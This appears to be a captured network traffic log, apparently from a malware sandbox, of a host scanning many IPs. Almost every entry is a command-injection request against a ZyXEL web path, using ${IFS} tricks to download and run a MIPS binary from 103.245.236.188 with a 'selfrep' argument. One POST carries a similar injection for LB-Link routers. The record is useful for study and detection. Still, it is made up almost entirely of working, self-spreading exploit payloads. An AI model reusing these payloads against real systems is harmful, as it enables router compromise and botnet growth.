                                    Jan 13, 2024 19:02:35.215316057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4741192.168.2.134475814.248.143.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215384007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4742192.168.2.134485012.91.137.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215459108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4743192.168.2.134560862.189.217.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215522051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4744192.168.2.1347546187.163.71.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215549946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4745192.168.2.1342166118.163.136.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215596914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4746192.168.2.1359472184.34.12.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215678930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4747192.168.2.1350516134.186.86.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215764999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4748192.168.2.1335896159.114.88.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.215879917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4749192.168.2.1344494199.252.136.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216032982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4750192.168.2.1339722159.254.124.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216118097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4751192.168.2.1344650196.231.21.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216192961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4752192.168.2.1357740109.81.238.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216258049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4753192.168.2.1355752156.142.187.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216322899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4754192.168.2.1356030149.30.119.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216403961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4755192.168.2.1343512145.102.53.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216476917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4756192.168.2.1356568189.152.218.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216537952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4757192.168.2.135546296.99.12.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216618061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4758192.168.2.135064243.90.2.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216681957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4759192.168.2.133442082.181.117.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216746092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4760192.168.2.134229654.111.229.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216845989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4761192.168.2.134405685.82.200.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216900110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4762192.168.2.134364093.134.241.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216939926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4763192.168.2.1340074144.143.148.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.216979980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4764192.168.2.135441424.35.51.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217050076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4765192.168.2.1335516150.132.173.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217093945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4766192.168.2.134364298.49.120.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217163086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4767192.168.2.1344578193.54.106.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217196941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4768192.168.2.133759049.213.198.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217247009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4769192.168.2.1360224180.20.241.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217303038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4770192.168.2.1344906119.201.136.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217351913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4771192.168.2.1347350105.165.32.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217422009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4772192.168.2.1353294121.222.90.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217484951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4773192.168.2.135580643.161.246.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217546940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4774192.168.2.1335836104.17.15.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217585087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4775192.168.2.1359512120.195.117.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217642069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4776192.168.2.136011614.185.68.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217715979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4777192.168.2.133333088.237.118.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217745066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4778192.168.2.1355704143.174.55.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217803001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4779192.168.2.134149089.52.184.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217878103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4780192.168.2.133523025.181.159.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217945099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4781192.168.2.133428262.139.79.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.217981100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4782192.168.2.134652284.137.104.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.218065977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4783192.168.2.134826684.8.77.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.218120098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4784192.168.2.1341038213.27.137.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.218167067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4785192.168.2.1342938198.154.5.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.218204021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4786192.168.2.135631070.193.31.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.218293905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4787192.168.2.135650648.41.74.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.218378067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4788192.168.2.135425094.121.128.858080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.385245085 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4789192.168.2.134579069.171.80.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.218555927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4790192.168.2.135519886.134.20.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.218679905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4791192.168.2.135759473.24.237.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.218801975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4792192.168.2.1360620148.195.239.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.218904972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4793192.168.2.1333620128.40.96.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219014883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4794192.168.2.135477632.93.156.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219079018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4795192.168.2.133832097.146.32.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219166994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4796192.168.2.1350424201.20.253.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219208002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4797192.168.2.1332834114.186.62.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219295025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4798192.168.2.1350772158.76.195.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219355106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4799192.168.2.1354034208.176.69.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219439983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4800192.168.2.134520294.171.103.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219491959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4801192.168.2.133730219.144.78.110443
                                    TimestampBytes transferredDirectionData
